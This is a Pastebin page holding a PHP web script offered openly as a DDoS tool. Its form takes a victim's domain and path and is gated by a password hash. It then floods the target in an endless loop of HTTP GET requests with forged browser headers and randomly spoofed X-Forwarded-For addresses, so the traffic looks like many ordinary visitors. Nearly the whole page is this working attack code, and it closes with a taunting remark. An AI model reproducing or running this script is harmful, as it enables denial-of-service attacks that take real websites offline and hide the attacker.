Advertisement
Bocah_cyber

PHP dDos Attack

Jul 22nd, 2012
384
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.91 KB | None | 0 0
  1.     <?
  2.     /* -- By Punker2Bot -- */
  3.  
  4.     $dominio = $_POST['host'];
  5.     $ruta = $_POST['path'];
  6.     $port = $_POST['port'];
  7.     $poder = $_POST['poder'];
  8.     $pw = $_POST['pw'];?>
  9.     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  10.     <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
  11.     <head>
  12.     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  13.     <meta name="msvalidate.01" content="ECAB4AE09BDECAEDA633439FD8D12D38" />
  14.     <meta name="author" content="Punker2Bot" />
  15.     <title>DDoser attacker Thuthuat247.com</title>
  16.     <style>
  17.     body { padding: 3px; }
  18.  
  19.     * {
  20.     background-color: #1F1F1F;
  21.     color: #0EEF57;
  22.     font-family: calibri,tahoma,verdana,terminal,serif,lucida,system;
  23.     font-size: 18px;
  24.     margin: 0; }
  25.  
  26.     input {
  27.     width: 440px;
  28.     border: solid 1px #00BCFF;
  29.     padding: 2px; }
  30.  
  31.     input.accion {
  32.     width: 215px;
  33.     border: solid 2px #00BCFF;
  34.     padding: 3px;
  35.     cursor: pointer }
  36.  
  37.     input:hover , input:active { border-color: #FFE900 }
  38.  
  39.     #dinamico {
  40.     padding: 3px;
  41.     font-size: 13px!important;
  42.     height: 300px;
  43.     min-height: 300px;
  44.     max-height: 300px;
  45.     overflow: hidden }
  46.     </style>
  47.     **********
  48.     function ir_a_bajo() {
  49.     var scc = document.getElementById('dinamico');
  50.     scc.scrollTop = scc.scrollHeight + scc.offsetHeight;
  51.     }
  52.     setInterval('ir_a_bajo()',75);
  53.     </script>
  54.     </head>
  55.     <body id="index">
  56.     <form action="" method="post" name="jaja">
  57.     <table>
  58.     <tr>
  59.     <td class="titulo">
  60.     Dominio</td> <td><input id="boton" type="text" name="host" value="<?php if($dominio=="") { print 'www.victima.com'; } else { print htmlentities($dominio); } ?>" size="40px" ></td>
  61.     </tr>
  62.     <tr>
  63.     <td class="titulo">
  64.     Path </td> <td> <input id="boton" type="text" name="path" value="<?php if($ruta=="") { print '/index.php'; } else { print htmlentities($ruta); } ?>" size="40px" /> </td>
  65.     </tr>
  66.     <tr>
  67.     <td class="titulo">
  68.     Puerto </td>
  69.     <td><input id="boton" type="text" disabled name="port" value="<?php if($port=="") { print '80 (disabled)'; } else { print htmlentities($port); } ?>" size="40px" /> </td>
  70.     </tr>
  71.     <tr>
  72.     <td class="titulo">
  73.     Code </td>
  74.     <td><input id="boton" type="text" name="pw" value="<?php if($pw=="") { print 'Password'; } else { print htmlentities($pw); } ?>" size="40px" /> </td>
  75.     </tr>
  76.     <tr>
  77.     <td class="titulo">
  78.     Preparado? </td> <td>
  79.     <input type="submit" value="DDosear now!" class="accion">   <input type="button" value="Dejar de atacar!" class="accion" /> </td>
  80.     </tr>
  81.     </table>
  82.     </form>
  83.     <br />
  84.     <div id="dinamico">
  85.     <?php
  86.     @set_time_limit(0);
  87.     $msj = array("<h2>No podes continuar, pw erroneo</h2></div></body></html>","<h2>Completa el form con los datos de la vicima!</h2></div></body></html>","<big><b>Error al atacar</b></big><br />\n","0a32e26a417d2c7cfbd333b7feb0a0a8","2e2234a41122a233cfbd333b9bc30a03");
  88.  
  89.     function ddoser($dominio,$ruta) {
  90.  
  91.     //hago un random de ips para no ser siempre el mismo vistitante
  92.     $ip_simulada = rand(188,254).'.'.rand(1,254).'.'.rand(1,254).'.'.rand(1,254);
  93.  
  94.     //defino y abro socket segun los datos del form
  95.     $socket = fsockopen($dominio, "80", $errno, $errstr, 30);
  96.  
  97.     // comienzan los datos del header para parecer una persona comun xD
  98.     $header = "GET ".$ruta." HTTP/1.1\r\n";
  99.     $header .= "Host: ".$dominio."\r\n";
  100.     $header .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16\r\n";
  101.     $header .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpg,image/gif,*/*;q=0.5\r\n";
  102.     $header .= "Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
  103.     $header .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
  104.     $header .= "Keep-Alive: 300\r\n";
  105.     $header .= "*****-Connection: keep-alive\r\n";
  106.     $header .= "Referer: http://".$dominio.$ruta."\r\n";
  107.     $header .= "Content-Type: application/x-www-form-urlencoded\r\n";
  108.     $header .= "X-Forwarded-For: ".$ip_simulada."\r\n";
  109.     $header .= "Via: CB-Prx\r\n";
  110.     $header .= "Connection: Close\r\n\r\n";
  111.  
  112.     //envio todo lo recolectado
  113.     $send_header = fwrite($socket,$header);
  114.  
  115.     //lo muestro en la web
  116.     if($send_header) {
  117.     print("Attacking as: <span style='color:#FF0F2F'>".$ip_simulada."</span> @ ".htmlentities(str_replace('www.','',$dominio))."".htmlentities($ruta)."<br />\n");
  118.     } else {
  119.     print("$msj[2]");
  120.     }
  121.     fclose($socket);
  122.     }
  123.     if($msj[3] !== (md5(md5($pw)))) { die ("$msj[0]");}
  124.     if($dominio !== "" && $dominio !== "www.victima.com") {
  125.     while(1) {
  126.     ddoser($dominio,$ruta);
  127.     }
  128.     } else { die ("$msj[1]");}
  129.     ?>
  130.     </div>
  131.     </body>
  132.     </html><? $el_saludo_es = "Chau gay, disfruta el script ;)" ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement